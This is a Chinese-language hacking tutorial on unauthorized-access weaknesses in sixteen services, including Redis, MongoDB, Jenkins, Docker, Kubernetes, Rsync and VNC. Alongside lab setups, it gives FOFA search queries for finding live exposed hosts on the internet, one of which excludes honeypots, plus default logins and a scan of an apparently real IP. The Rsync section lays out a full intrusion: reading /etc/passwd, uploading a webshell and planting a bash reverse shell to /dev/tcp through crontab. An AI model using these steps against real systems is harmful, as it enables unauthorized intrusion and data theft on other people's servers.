一.Redis未授權訪問漏洞
1.首先需要準備一個vps和vulhub靶場,然后進入目錄。
命令:進入靶場目錄:cd /etc/vulhub-master/redis/4-unacc? 啟動靶場:docker-compose up -d
2.然后啟動我們kali,下載redis服務然后連接redis,并執行命令。(這一步就證明存在未授權訪問漏洞)
命令:下載redis:apt-get install redis? ? 連接:redis-cli -h 靶場IP -p 端口
3.接下來需要下載一個攻擊項目:https://github.com/n0b0dyCN/redis-rogue-server
4.下載在我們的vps上然后啟動,啟動命令:python3 redis-rogue-server.py --rhost 目標IP地址 --lhost 本機IP地址
5.然后就可以執行命令了(反彈shell)
二、MongoDB未授權訪問漏洞
1.首先需要搭建靶場。
命令:拉取鏡像:docker pull mongo? ?啟動容器:docker run -d -p 272017:27017 --name mongodb mongo
2.然后我們使用kali的nmap的插件進行掃描,去掃描一下未授權訪問漏洞。命令:nmap -p 27017 --script mongodb-info 47.105.65.103
?3.驗證存在未授權訪問漏洞后就直接可以使用navicat連接了。
三、Memcached未授權訪問漏洞
1.首先我們需要下載Memcached:https://www.runoob.com/memcached/window-install-memcached.html。
2.接下來執行命令:memcached.exe -d install? ? ----> memcached.exe -d start?
3.接下來打開kali探測,輸入:telnet 172.16.2.26 11211 ,接下來就可以操作命令。
3.接下來就可以使用namp程序進行漏洞掃描,打開kali輸入:nmap -p 11211 --script memcached-info 172.16.2.26
四、Jenkins未授權訪問漏洞
1.使用fofa語法搜索
fofa語法:port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
2.搜到結構篩選到有manage Jenkins的然后按照圖片執行。
五、Jupyter NoteBook
1.首先通過fofa語法搜索:"Jupyter Notebook" && port="8888" && "terminals"。然后按照圖片操作。
2.然后接下來就可以執行命令了
六、Elasticsearch未授權訪問漏洞
1.首先利用fofa搜索,fofa語法:"Elasticsearch" && port="9200"。搜索出來后就可以在后面加上一些敏感目錄就可以訪問到了。
2.訪問到后就可以看到了
七、Kibana未授權訪問漏洞
1.使用fofa語法搜索資產,fofa語法:"kibana" && port="5601"
2.接下來尋找有漏洞的網址,有漏洞的網址如圖所示
八、Docker Remote API未授權訪問漏洞
1.使用fofa搜索:port="2375" && "docker"
2.搜索到后就可以測試是否存在漏洞了,如圖所示操作。
九、Kubernetes API Server未授權訪問漏洞
1.首先使用fofa搜索:port="8080" && app="Kubernetes"
2.然后接下來在可以使用的網站后面拼接/version,就可以看到信息了
十、Hadoop未授權訪問漏洞
1.使用fofa搜索:port="8088" && app="Hadoop"
2.開啟頁面直接訪問不用經過用戶密碼驗證就可以了
十一、ActiveMQ未授權訪問漏洞
1.使用fofa搜索:body="ActiveMQ" && port="8161"
2.然后在網址后面拼接/admin進入后臺登錄,默認賬戶密碼都為:admin
3.登錄成功后就可以查看信息了
十二、RabbitMQ未授權訪問漏洞
1.我們使用fofa搜索:port="15672"或者port="15692"或者port="25672"、
2.打開頁面后就可以登錄了,默認賬戶、密碼都是guest
十三、Sprinboot Astuator未授權訪問漏洞
1.使用fofa搜索:icon_hash="116323821"
2.當點開鏈接出來以下界面,就代表定當前 web 應用是使用了springboot 框架
3.可以拼接以下路徑查看泄露的數據。
訪問/trace端點可以獲取基本的HTTP請求跟蹤信息,訪問/env端點獲取全部環境屬性
十四、JBOSS未授權訪問漏洞
1.我們點開fofa搜索:title="Welcome to JBoss" && icon_hash="-656811182"并且打開一個鏈接。
2.然后在后面拼接/jmx-console/就可以之間登錄進去了
十五、Rsync未授權訪問漏洞
1.這一關我們需要用到vulhub靶場,我們來到vulhub靶場然后啟動。
命令:?
cd vulhub/rsync/common
docker-compose up -d
2.然后我們來到kali執行命令:rsync rsync://自己靶機的IP/
3.然后我們就可以下載目標靶機上的文件。輸入命令:rsync rsync://IP:port/src/etc/passwd ?標路徑
4.然后我們查看以下下載下來的文件,可以看到成功下載了passwd
5.我們也可以上傳文件,比如一句話木馬。我們輸入:rsync ./phpinfo.php rsync://目標靶機ip/src/home 。 phpinfo.php里面寫上一句話木馬。
6.接下來我們就可以反彈shell,查看定時任務
7.然后將定時任務文件下載下來,輸入:rsync rsync://靶機ip/src/etc/crontab /tmp/tmp/crontab.txt
8.然后創建一個shell文件,輸入:/bin/bash -i >& /dev/tcp/監聽靶機IP/4444 0>&1
9.給文件授權,輸入:chmod 777 shell
10.上傳shell到靶機,輸入:rsync -av /tmp/tmp/shell rsync://靶機ip/src/etc/cr
十六、vpc未授權訪問漏洞
1.使用fofa搜索:(port="5900") && (is_honeypot=false && is_fraud=false)
2.然后打開kali,輸入:msfconsole
3.然后輸入:use auxiliary/scanner/vnc/vnc_none_auth